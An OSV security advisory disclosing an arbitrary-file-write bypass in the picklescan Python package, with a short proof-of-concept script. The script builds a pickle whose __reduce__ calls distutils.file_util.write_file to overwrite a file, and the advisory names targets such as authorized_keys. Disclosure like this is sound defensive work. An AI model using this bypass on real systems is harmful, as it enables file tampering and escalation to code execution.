PYSEC-2026-1791

See a problem?
Import Source
https://github.com/pypa/advisory-database/blob/main/vulns/picklescan/PYSEC-2026-1791.yaml
JSON Data
https://api.osv.dev/v1/vulns/PYSEC-2026-1791
Aliases
Published
2026-07-07T16:03:14.308951Z
Modified
2026-07-07T17:48:02.358421063Z
Severity
  • 8.9 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P CVSS Calculator
Summary
Picklescan vulnerable to Arbitrary File Writing
Details

Summary

Picklescan has got open() and shutil in its default dangerous blocklist to prevent arbitrary file overwrites. However the module distutils isnt blocked and can be used for the same purpose ie to write arbitrary files.

Details

This is another vulnerability which impacts the downstream user.

By constructing a pickle that user distutils.fileutil.writefile, an attacker can overwrite critical system files (like .ssh/authorized_keys, web server configurations, or source code) to achieve DoS or escalate to RCE.

PoC

import pickle
import distutils.file_util

class FileWriteBypass:
    def __reduce__(self):

        target_file = "pwned_config.env"
        content = ["print('I have overwritten your config')"]

        return (distutils.file_util.write_file, (target_file, content))

payload = pickle.dumps(FileWriteBypass())
with open("bypass_filewrite.pkl", "wb") as f:
    f.write(payload)

print("bypass_filewrite.pkl")

<img width="853" height="197" alt="image" src="https://github.com/user-attachments/assets/a129f5aa-a050-4e88-adb7-5a6f93e35b65" />

To fix this just add disutil to the blacklist

References

Affected packages

PyPI / picklescan

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.0.33

Affected versions

0.*
0.0.1
0.0.2
0.0.3
0.0.4
0.0.5
0.0.6
0.0.7
0.0.8
0.0.9
0.0.10
0.0.11
0.0.12
0.0.13
0.0.14
0.0.15
0.0.16
0.0.17
0.0.18
0.0.19
0.0.20
0.0.21
0.0.22
0.0.23
0.0.24
0.0.25
0.0.26
0.0.27
0.0.28
0.0.29
0.0.30
0.0.31
0.0.32

Database specific

source
"https://github.com/pypa/advisory-database/blob/main/vulns/picklescan/PYSEC-2026-1791.yaml"